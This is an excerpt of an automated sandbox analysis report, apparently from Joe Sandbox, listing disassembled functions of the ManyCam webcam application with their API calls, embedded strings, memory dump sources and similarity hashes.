Instruction Fuzzy Hash: 8891F7B1E002489FDB04DFA8D896BEEBBB5BF88304F10816DE419A7381DB345A45CF91

Function 00B94C20 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B94CA7
RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,0004001F,00000000,?,00000000), ref: 00B94D0E
RegEnumKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,?), ref: 00B94D4B

Strings

Left, xrefs: 00B94E1C
Top, xrefs: 00B94E35

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: CreateEnumOpen
String ID: Left$Top
API String ID: 1535768306-3873733008
Opcode ID: 4c0648dfdea83312e0bfb7d06edf043e98eee5851714373c65693d9a76f06aab
Instruction ID: 6e87f522736512c6fe8a7eae09d9f516ea508e247532cff44db2d58015d81c91
Opcode Fuzzy Hash: 4c0648dfdea83312e0bfb7d06edf043e98eee5851714373c65693d9a76f06aab
Instruction Fuzzy Hash: D651C3B2104245AFDB20DB64DC90EBBB7EDFBC8304F04496DF69587251E771AD0987A2

Function 00514480 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144AB
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000), ref: 005144B6
?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?,?), ref: 00514559
?IncreaseBpp@CxImage@@QAE_NK@Z.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 00514563
?AlphaCreate@CxImage@@QAE_NXZ.CXIMAGECRT(00000018,00000160,00000000,00000001,00000000,?,?,?,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 0051456B
?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?,?,?,00000000,?,?,?), ref: 005145B1
_DebugHeapAllocator.LIBCPMTD ref: 005145DC
?Resample@CxImage@@QAE_NJJHPAV1@@Z.CXIMAGECRT(?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF,?,005125AA,?), ref: 0051463E
?Save@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000004,?,00569E8C,00000001,00000000,00000000,0056A220,00000000,00000004,00000160,00000120,00000001,7EC02BB4,000000FF), ref: 00514651

Strings

352x288, xrefs: 0051458D
%s\%d.png, xrefs: 00514592
%s\%d.png, xrefs: 005145F6
640x480, xrefs: 005145F1

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$Resample@Save@V1@@$AllocatorAlphaBpp@Create@DebugHeapHeight@IncreaseWidth@
String ID: %s\%d.png$%s\%d.png$352x288$640x480
API String ID: 2860891125-2440275166
Opcode ID: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
Instruction ID: acc42daae56a842fc35e0990e2763de5810e809cf3d34599ed660b5ee8a323ea
Opcode Fuzzy Hash: a43d91bb6eb54d53ff6a1737a5b0fe56c092a8fccabc49aed94ca0378de78455
Instruction Fuzzy Hash: 5A6107B5E00209AFDB04EF99D892AEEBBB5FF88300F108529F515B7291DB746941CF94

Function 00B9CA70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 371COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(00000000), ref: 00B9CAF6
??2@YAPAXI@Z.MSVCR80(00000000,00000000), ref: 00B9CB12
??2@YAPAXI@Z.MSVCR80(?,00000000,00000000), ref: 00B9CB1F

Strings

II*, xrefs: 00B9CB29
r+b, xrefs: 00B9CE61

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@
String ID: II*$r+b
API String ID: 1033339047-1110506143
Opcode ID: 2b274b65d65becda1309347fc64fad1e50ab1d8a2a37c986607af837f9e5be9b
Instruction ID: 0c2a133c2c35482d06dad41d4a2fc286bc70289c90cc079c61663bb460c097bd
Opcode Fuzzy Hash: 2b274b65d65becda1309347fc64fad1e50ab1d8a2a37c986607af837f9e5be9b
Instruction Fuzzy Hash: FCC18070348300ABDB14DF28C892B2FBBE5EBC9740F50086DF6869B391DBB5D9458796

Function 00472C60 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 270memoryCOMMON

Download Yara Rule

APIs

_wfopen_s.MSVCR80 ref: 00472CBE
fclose.MSVCR80 ref: 00472CDF
_DebugHeapAllocator.LIBCPMTD ref: 00472D41
_DebugHeapAllocator.LIBCPMTD ref: 00472D53
_DebugHeapAllocator.LIBCPMTD ref: 00472E2E
_DebugHeapAllocator.LIBCPMTD ref: 00472E59
_DebugHeapAllocator.LIBCPMTD ref: 00472E98

Strings

prop, xrefs: 00472F05
name, xrefs: 00472F2B
base_class, xrefs: 00472DD6
class, xrefs: 00472D67
val, xrefs: 00472F52

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$_wfopen_sfclose
String ID: base_class$class$name$prop$val
API String ID: 1905607448-2961531382
Opcode ID: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
Instruction ID: 751db2e67e60f486d96aaf90422ccf13f7de2e4e99e3856fc400571b524def08
Opcode Fuzzy Hash: 265c9ab7eb5baf22480eda760dc822cfc626c5c0d99404b903e2b5ff3dc1b93f
Instruction Fuzzy Hash: 47C14C70901258DEDB14EBA4CD55BEEBBB4BF50308F10819EE14A67292DB781F88CF95

Function 00BB0E70 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 178COMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00BB0EB5

Strings

Application is running with png.c from libpng-%.20s, xrefs: 00BB0F9C
Incompatible libpng version in application and library, xrefs: 00BB0FAE
Application was compiled with png.h from libpng-%.20s, xrefs: 00BB0F7F
1.2.2, xrefs: 00BB0FED
zlib memory error, xrefs: 00BB101A
1.2.8, xrefs: 00BB0F1F, 00BB0F4C, 00BB0F94
Unknown zlib error, xrefs: 00BB1028
zlib version error, xrefs: 00BB1021

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _setjmp3
String ID: 1.2.2$1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$Incompatible libpng version in application and library$Unknown zlib error$zlib memory error$zlib version error
API String ID: 3837033383-2455210892
Opcode ID: d655362dc4bb40aa4ec354c44a7d4f37f9be14dffc00173809a9344935bf2ca2
Instruction ID: 81ad38f9c51c413c3ef469b1891d16a2e0b608cb485c04328f480d0dc28552fd
Opcode Fuzzy Hash: d655362dc4bb40aa4ec354c44a7d4f37f9be14dffc00173809a9344935bf2ca2
Instruction Fuzzy Hash: 8751D271A10744AFD720AF649852FFBB7E9EF45300F044599F98997301EBF0A9058BA1

Function 0042E150 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0042E198

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

_DebugHeapAllocator.LIBCPMTD ref: 0042E1D1

Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE

_DebugHeapAllocator.LIBCPMTD ref: 0042E203

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

_DebugHeapAllocator.LIBCPMTD ref: 0042E23C
_DebugHeapAllocator.LIBCPMTD ref: 0042E258
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
_DebugHeapAllocator.LIBCPMTD ref: 0042E2A5

Strings

www.manycam.com, xrefs: 0042E35A
Creation date: , xrefs: 0042E250
Created by: , xrefs: 0042E1FB
www.manycam.com, xrefs: 0042E346
Name: , xrefs: 0042E190

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$DateFormat
String ID: Created by: $Creation date: $Name: $www.manycam.com$www.manycam.com
API String ID: 393568584-1701023392
Opcode ID: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
Instruction ID: cbadc1f5ef3ad51f7f35ce95d366eb704496e5c2bb1529dbc726db86d70e8f02
Opcode Fuzzy Hash: 6ae18c8123b619394136c12ce8f0d690e019f5e653af45ce7849ef6131bd0f08
Instruction Fuzzy Hash: 65711771A001199FCB14EB64CD91BEEB7B4BF48304F10869DE55AA7291DF34AE88CF94

Function 00406670 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F

GetParent.USER32 ref: 0040669A
GetWindow.USER32(?,00000004), ref: 004066AD
GetWindowRect.USER32(?,?), ref: 004066C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D
GetWindowRect.USER32(00000000,?), ref: 0040673B
GetParent.USER32(?), ref: 00406749
GetClientRect.USER32(?,?), ref: 0040675A
GetClientRect.USER32(00000000,?), ref: 00406768
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040677C
SetWindowPos.USER32(7EC02BB4,00000000,00000000,7EC02BB4,000000FF,000000FF,00000015,?,?), ref: 00406826

Strings

*b@, xrefs: 004067BB, 004067FF, 0040680A

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Window$Rect$ClientLongParent$InfoParametersPointsSystem
String ID: *b@
API String ID: 2289592163-3951841937
Opcode ID: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
Instruction ID: 1e1c0fd00856f1237eb481f10da8126670bc63b2ce16d521bf68457a350c038b
Opcode Fuzzy Hash: 85e0b70c33394ba71c68aafcb1af9cf7bac2a856a7ed6dfd4d8bfa7c3afbd8a7
Instruction Fuzzy Hash: BA611975E00209EFDB04CFE8C984AEEBBB5BF88304F148629E516BB394D734A945CB54

Function 0041C950 Relevance: 19.7, APIs: 13, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetStockObject.GDI32(00000000), ref: 0041C9C4
FillRect.USER32(?,?,00000000), ref: 0041C9D3
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041C9FF
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT ref: 0041CA2E
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA56
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000), ref: 0041CA6D
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CA97
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CAC5
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB0E
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB36
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB4D
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CB77
?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000), ref: 0041CBA5

Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image@@$C__@@Draw@U3@_Utag$Width@$Rect$ClientFillHeight@ObjectStock
String ID:
API String ID: 1214153398-0
Opcode ID: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
Instruction ID: 64adb8edbe6d6a745132db4a95317a47dd4f78eb1bf019a77eab89ed2a27929a
Opcode Fuzzy Hash: 1d1617abfc9fbb8697bfd5c8fbec6c435857e0e2642eb5cd6e205186f3222b68
Instruction Fuzzy Hash: 8A81C3B4D002099FDB58EF98D991BEEB7B5BF48304F20816AE519B7381DB342A45CF64

Function 00502A40 Relevance: 19.7, APIs: 13, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
Instruction ID: 12e37dd4abdcf4f70f14d239c3f2fb0002299592faa212dd5bf358f334e534ec
Opcode Fuzzy Hash: 898b4d837ae699b25311b23fbbf044c2f725344d7131efd26da484f397ae12a6
Instruction Fuzzy Hash: 20615470904308EFDB14DFA4D85AAEEBFB6BF55310F204A19E516AB2D1EB305A48DB50

Function 00434E60 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

Date & Time, xrefs: 00434EF4
#NC, xrefs: 00434EB0, 00435002, 00435192, 004351A6, 00434FD1, 00434EB3, 00434FD4, 00435005, 00435195, 004351A9
Backgrounds, xrefs: 00435130
Drawing over video, xrefs: 00434F75
Text over video, xrefs: 00434F36

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID: #NC$Backgrounds$Date & Time$Drawing over video$Text over video
API String ID: 0-745308588
Opcode ID: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
Instruction ID: 61b0055fb2e5cbe1d4e4773f87cdc9b928e12edc189f893c90bd2281fadebac5
Opcode Fuzzy Hash: e89cde5ceba465d579d9307fe3d900b605cbcdb901679e140c7094b8ba2244ab
Instruction Fuzzy Hash: D4B14271D052189FCF08EFE5D851BEEBBB5BF48308F14452EE10A6B282DB385945CB99

Function 00406B70 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 325stringCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,00000000,00000008), ref: 00406BCD
lstrcmpiW.KERNEL32(00000000,static), ref: 00406BE4

Part of subcall function 00407320: GetWindowLongW.USER32(-00000004,000000F0), ref: 00407331

Part of subcall function 00406840: GetWindowLongW.USER32(?,000000F0), ref: 0040684F

LoadCursorW.USER32(00000000,00007F89), ref: 00406C72
GetStockObject.GDI32(0000000D), ref: 00406CC9
memset.MSVCR80 ref: 00406D0D
CreateFontIndirectW.GDI32(00000000), ref: 00406D7E

Strings

Software\Microsoft\Internet Explorer\Settings, xrefs: 00406F6A
Anchor Color Visited, xrefs: 00407045
Anchor Color, xrefs: 00406FE4
static, xrefs: 00406BDB

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: LongWindow$ClassCreateCursorFontIndirectLoadNameObjectStocklstrcmpimemset
String ID: Anchor Color$Anchor Color Visited$Software\Microsoft\Internet Explorer\Settings$static
API String ID: 537339791-2739629574
Opcode ID: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
Instruction ID: 199e44e7be4628ee2e688c610ba56af09b0a08d7a3a9a70c30624c5daa12086b
Opcode Fuzzy Hash: 99ecedde21c05c3d22bbeafe7e2b67f4cdb7fe62b879cd42fd35616c0f2689b9
Instruction Fuzzy Hash: 45E14970A042689FDB64DB65CC49BAEB7B1AF04304F1042EAE54A772D2DB346EC4CF59

Function 004AAFD0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 254COMMON

Download Yara Rule

Strings

CEffectStack::SelectEffect, xrefs: 004AAFF8
Effect pointer is NULL., xrefs: 004AB018
AN, xrefs: 004AAFEC
No such effect found in stack, xrefs: 004AB072

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorDebugHeapfflushfwprintf
String ID: CEffectStack::SelectEffect$Effect pointer is NULL.$No such effect found in stack$AN
API String ID: 2739697835-3664681806
Opcode ID: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
Instruction ID: 60628f8e65fa033cdeac9a30f19292ee3b75e2ecbf0df95034a13fcf3e9652a5
Opcode Fuzzy Hash: 221cc7908e8e233be853d1dd1845420aec90c9ea438a58ddf34726c8fe8ac0e0
Instruction Fuzzy Hash: FEB13A70E00208DFDB14DFA9C895BEEBBB5FF59314F10811EE415AB292DB786905CB98

Function 00BB9C70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BB9E39
_ftol.MSVCR80 ref: 00BB9E54
_ftol.MSVCR80 ref: 00BB9E6F
_ftol.MSVCR80 ref: 00BB9E8A
_ftol.MSVCR80 ref: 00BB9EA5
_ftol.MSVCR80 ref: 00BB9EC0
_ftol.MSVCR80 ref: 00BB9EDB
_ftol.MSVCR80 ref: 00BB9EF6

Strings

Ignoring attempt to set negative chromaticity value, xrefs: 00BB9F1B
Ignoring attempt to set chromaticity value exceeding 21474.83, xrefs: 00BB9F0B

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol
String ID: Ignoring attempt to set chromaticity value exceeding 21474.83$Ignoring attempt to set negative chromaticity value
API String ID: 2545261903-1928962588
